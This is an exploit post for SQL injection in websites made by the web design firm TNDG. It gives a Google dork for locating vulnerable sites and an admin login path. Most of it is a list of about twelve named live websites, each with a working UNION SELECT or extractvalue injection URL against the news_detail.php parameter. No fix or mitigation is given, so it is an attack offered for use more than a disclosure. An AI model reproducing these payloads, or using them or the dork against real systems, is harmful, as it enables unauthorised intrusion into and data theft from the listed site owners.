###################### # Exploit Title : Design by TNDG SQL Injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage : http://www.tndg.com.tw/ # Google Dork : intext:"Design by TNDG" news_detail.php # Date: 04 Feb. 2016 # Tested On : Win 10 / Google Chrome / Mozilla Firefox # ###################### # admin page: target/manager/login.php # # demos : # http://www.thwca.org.tw/ch/news_detail.php?Sn=-79+union+select+1,2,version(),4,5,6,7--%20- # http://www.uni-biotech.com/en/news_detail.php?Sn=-185+union+select+1,2,3,4,5,version(),7,8,9,10,11,12,13,14,15 # http://www.chaheng.com/english/news_detail.php?Sn=-41+union+select+1,2,3,4,version(),6,7,8,9,10 # http://www.jacn.com.tw/ch/news_detail.php?Sn=-73+union+select+1,2,3,4,version(),6,7,8,9,10,11,12 # http://www.chuandi.com.tw/ch/news_detail.php?Sn=-80+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.psjy.tw/ch/news_detail.php?Sn=-33+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.extremepower911.com/ch/news_detail.php?Sn=-7+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.nextapogee.com.tw/en/news_detail.php?Sn=-15+union+select+1,2,3,4,5,version(),7,8,9,10,11,12--%20- # http://www.venture21.net/en/news_detail.php?c=News&i=34+and+extractvalue%28rand%28%29,concat%280x7e,version%28%29%29%29-- # http://www.kdmilk.com.tw/ch/news_detail.php?Sn=-20+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.motherwang.com/ch/news_detail.php?Page=1&Sn=-82+union+select+1,2,3,version(),5,6,7,8,9,10 # http://www.new-ocean.com.tw/ch/news_detail.php?Sn=-17+union+select+1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15 ###################### # discovered by : modiret ######################